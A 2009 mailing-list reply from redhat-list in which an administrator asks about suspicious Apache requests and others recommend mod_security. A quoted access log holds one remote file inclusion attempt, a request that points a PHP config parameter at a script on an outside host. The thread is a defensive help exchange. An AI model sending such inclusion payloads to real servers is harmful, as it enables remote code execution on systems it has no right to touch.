El mié, 08-07-2009 a las 10:26 +0200, Daniel Carrillo escribió: > 2009/7/8 ESGLinux <esggrupos@xxxxxxxxx>: > > Hi all, > > I´m having a problem with an Apache web server. > > > > I get a lot of access ot this kind: > > > > > > x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET > > //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt??? > > HTTP/1.1" 404 1015 "-" "Mozilla/5.0" > > > > where x.x.x.x is the ip of the client, I suposse this ip is trying to find a > > security hole in my system, so what I do manually is this: > > With Apache, a very useful tool to block this events is mod_security. Agreed, but it won't block the IP but the GET. But you're correct, mod_security is mandatory in any webserver facing the internet :-) Manuel. -- Manuel Arostegui Ramirez. Electronic Mail is not secure, might not be read every day, and should not be used for urgent or sensitive issues. -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
